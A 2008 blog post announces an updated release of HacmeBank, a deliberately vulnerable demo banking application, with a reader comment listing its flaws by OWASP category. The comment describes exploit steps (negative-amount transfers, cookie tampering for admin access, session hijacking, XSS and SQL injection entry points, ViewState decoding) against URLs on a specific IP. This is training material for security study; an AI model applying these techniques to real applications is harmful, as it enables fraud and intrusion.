Updated version of HacmeBank
Monday, December 8, 2008 at 1:19AM I've just uploaded an updated (to VS 2008) version of HacmeBank (a Demo Banking application with several critical vulnerabilities). I was one of the developers of this Open Source application which was originally published by Foundstone (download the original version from here).
In addition to the original code/vulnerabilities, I've also included on this package a tool I developed ages ago called the 'SQL Injection Database Explorer' and allows the remote browsing of databases hosted by the HacmeBank SQL Server (using the SQL Injection vulnerability on the Login form of home page).
I'm publishing this application here because I'm planning to use it on multiple demos or O2 functionality (and because there are several technical elements of HacmeBank that I want to talk about in future posts)
So, you can download the binaries/source code from here:HacmeBank_v2.0 (Dinis version - 7 Dec 08).zip (4M), and I've created 3 videos which you can see by clicking on the screenshots below:
Reader Comments (1)
I found this from an WAF Bake-off event I organized in Apr 06 in London. Need to clean it up a bit, but it is a good start for the list of vulnerabilities in HacmeBank
A1 Unvalidated Input
Vulnerability: Account Transfer validation for negative values is
only performed at the client:
Exploit: Use a proxy (or a browser tamper plugin) to inject a
negative number in the Form
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer (this will
transfer an amount TO the source account FROM the target account ( i.e.
the opposite of expected behavior)
Vulnerability: Maximum number of login attempts is controlled by
client-side cookie
Exploit: Use a proxy (or a browser tamper plugin) to change the
value of the CookieLoginAttempts (for example to 5000)
A2 Broken Access Control:
Vulnerability: Admin pages available to anonymous users:
Exploit after login, a normal user is able to access the following
admin pages:
http://209.97.215.160/aspx/Main.aspx?function=admin\Fetch_Web_Page
http://209.97.215.160/aspx/Main.aspx?function=admin\Manage_Accounts
http://209.97.215.160/aspx/Main.aspx?function=admin\Manage_Messages
http://209.97.215.160/aspx/Main.aspx?function=admin\Manage_Users
http://209.97.215.160/aspx/Main.aspx?function=admin\Sql_Query
http://209.97.215.160/aspx/Main.aspx?function=admin\Web_Services
Note: these pages must be available to valid administrators
A3 Broken Authentication
Vulnerability: Session Hijacking via ASP.NET_Session cookie
Exploit: discover a valid ASP.NET_Session cookie, and hijack that
account by changing the cookie on the browser or injecting it via a proxy
Vulnerability: Admin site protected with weak cookie
Exploit: Access to the admin site is controlled by a client side
cookie called 'admin' (On login, this value is false, and set to true
after successful Response to the Challenge posted here
http://209.97.215.160/aspx/main.aspx?function=AdminSection). To access
the admin area, login as a normal user and change the value of the
'admin' cookie from false to true
Vulnerability: WebServices are accessible by anonymous users:
Exploit: Access the WebServices directly
A4 Cross site Scripting (XSS):
Vulnerability: Cross site Scripting (XSS)
Exploit: Insert XSS payload in:
- Account Transfer 'Comment': field
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
- Request a Loan' 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=Loan
- Post Message 'Subject' or 'Text' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
A6 Injection Flaws
Vulnerability: SQL Injection
Exploit: Insert SQL payload in:
- Login Page 'Username' or 'Password' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
- Transaction Details account_no GET field:
http://209.97.215.160/aspx/Main.aspx?function=TransactionDetails&account_no=5204320422040001
- Account Transfer 'Comment': field
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
- Request a Loan' 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=Loan
- Post Message 'Subject' or 'Text' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
A7 Improper Error Handling
Vulnerability: Detailed error messages sent to client:
Exploit: Force SQL errors on:
- Login Page 'Username' or 'Password' fields:
http://209.97.215.160/aspx/main.aspx?function=PostMessageForm
- Account Transfer 'Comment': field
http://209.97.215.160/aspx/main.aspx?function=AccountTransfer
- Request a Loan' 'Comment' field:
http://209.97.215.160/aspx/main.aspx?function=Loan
A8 Insecure Storage:
Vulnerability: SessionState contains Challenge's Response
Exploit: 1) Decode the ViewState from the Admin Section login page
(http://209.97.215.160/aspx/main.aspx?function=AdminSection), 2)
discover the Challenge's Response value in the decoded ViewState, and 3)
use that value to login to the admin area (the Challenge's Response
value is stored in a Asp.net control which is marked with
'visible=false' (but still stored in the ViewState))
Vulnerability: Challenge's Response weak encryption
Exploit: Brute force the Challenge's Response since it is calculated
by XORing the Challenge against a simple number
A10 Insecure Configuration Management
Vulnerability: Directory Listing Enabled
Exploit: Open the page http://209.97.215.160/install/